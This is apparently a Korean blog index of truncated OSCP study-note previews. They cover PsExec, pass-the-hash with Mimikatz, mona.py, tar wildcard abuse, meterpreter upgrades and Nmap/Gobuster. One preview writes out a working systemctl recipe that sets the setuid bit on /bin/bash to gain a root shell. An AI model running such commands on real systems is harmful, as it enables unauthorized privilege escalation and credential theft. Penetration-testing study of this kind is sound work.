OSCP/도구 개념 정리 12

psexec, winexe(linux버전)

PSExec 유틸리티는 원격 시스템에 몇 가지 사항이 필요합니다. SMB (서버 메시지 블록) 서비스를 사용할 수 있고 연결할 수 있어야합니다 (예 : 방화벽에 의해 차단되지 않아야 함). 파일 및 인쇄 공유를 활성화해야합니다. 및 단순 파일 공유를 비활성화해야합니다. Admin$ 공유가 사용 가능하고 액세스 가능해야합니다. Windows 디렉터리에 매핑되는 숨겨진 SMB 공유는 소프트웨어 배포를위한 것입니다. PSExec 유틸리티에 제공된 자격 증명에는 Admin$ 공유에 액세스 할 수있는 권한이 있어야합니다. PSExec에는 실행 파일 내에 Windows 서비스 이미지가 있습니다. 이 서비스를 가져와 원격 시스템의 Admin$ 공유에 배포합니다. 그런 다음 SMB를 통한 DCE / RPC 인터페이스를..

Passing the Hash: How to hack Windows Server 2012 - Privilege Escalation to Domain Admin

Passing the Hash: How to hack Windows Server 2012 - Privilege Escalation to Domain Admin www.youtube.com/watch?v=SpLMuVs-qoc Tool: remmina: rdesktop과 동일, 윈도우 원격접속도구 MimiKatz: 메모리에 저장된 ntlm Hash값을 덤프 할 수 있다. * pth기법을 위해 NTLM HASH가 필요한 것이기 때문에 다른 해시덤프 도구를 사용해도 된다. WCE, fdump 등.. pth-winexe: ntlm 해쉬값을 가지고 원격 도메인 서버에 대한 접근 및 로그인, 명령어를 수행할 수 있다. windows2012부터는 credential을 평문으로 저장하지 않는다. (2008, 2003은 ..

mona

■ 우선 다양한 명령에 적용 가능한 Global Options가 존재한다. 중요한 옵션들은 다음과 같다. -n // 널바이트가 포함된 주소 제외 -o // OS에 종속된 모듈 제외 -m // 특정 모듈 지정 -cm // aslr, safeseh 등 조건 지정 -cpb // 금지 문자 지정 ■ assemble/asm 어셈블리어를 기계어로 보여준다. 명령 사이는 #으로 구분한다. !mona asm -s "pop eax#pop ecx#ret" ■ DLL을 지정하여 jmp esp의 코드를 찾음 !mona find -s "\xff\xe4" -m slmmfc.dll !mona find -s "jmp esp" -m slmmfc.dll ■ findwild findwild는 "*"를 이용한 검색을 할 수 있도록 해준다...

Exploiting wildcards on Linux - 권한상승

Exploiting wildcards on Linux * Cronjob이 관리자 권한으로 스크립트 실행할 때, tar 와일드카드 취약점을 콤보로 사용가능 관련작업: TryHackMe - Skynet DefenseCode는 Leon Juranic 연구원이 Unix 명령에서 와일드 카드 사용과 관련된 보안 문제를 자세히 설명하는 권고를 발표했습니다. 이 주제는 과거에 전체 공개 메일 링리스트에서 논의되었는데, 일부 사람들은 이것을 버그보다는 기능으로 더 많이 보았습니다. Juranic은 Linux / Unix 명령에 * 와일드 카드를 사용하는 실습으로 인한 위험을 강조하는 5 가지 실제 악용 사례를 제공했습니다. chown, tar, rsync 등의 특정 옵션을 사용하여 이 문제가 나타날 수 있습니다. 특수..

Meterpreter

미터프리터 전환 방법 두가지 - 백그라운드 전환 후 (컨트롤+z) 첫번째, sessions -u 1 두번째, use post/multil/manage/shell_to_meterpreter msf post(shell_to_meterpreter) > set session 1 msf post(shell_to_meterpreter) > exploit 참고: https://www.hackingarticles.in/command-shell-to-meterpreter/ we can use “-u” (option) with the session ID for upgrading our shell into meterpreter session. Exploit 후 프로세스 migrate하기 - 해쉬덤프전 수행해야하는 단계 우리..

Systemctl

https://gtfobins.github.io/gtfobins/systemctl/ 1. systemctl 경로를 환경에 맞게 수정 2. bash 권한에 스티키 비트 추가 구문 수정 TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target' > $TF ./systemctl link $TF ./systemctl enable --now $TF 위 명령 실행 후.. 스티키비트 생성 확인 $ ls -l /bin/bash 루트 권한 확인 $ /bin/bash -p -p: posix모드..? $ id

Nmap, Gobuster, JohnTheRipper

Nmap -p-: scan all port -Pn: Disable host discovery and just scan for open ports -sV: Service Scan -sC: Scan with the default nmap scripts -A: Enables OS and version detection, executes in-build scripts for further enumeration nmap -sV -vv --script vuln TARGET_IP 포트 명시 안하면 기본적으로 1000개를 검색한다. --script vuln : 스크립트 파일명에 vuln이 포함된 nse파일을 검색한다. GoBuster flag gobuster dir -u http://:3333 -w Descriptio..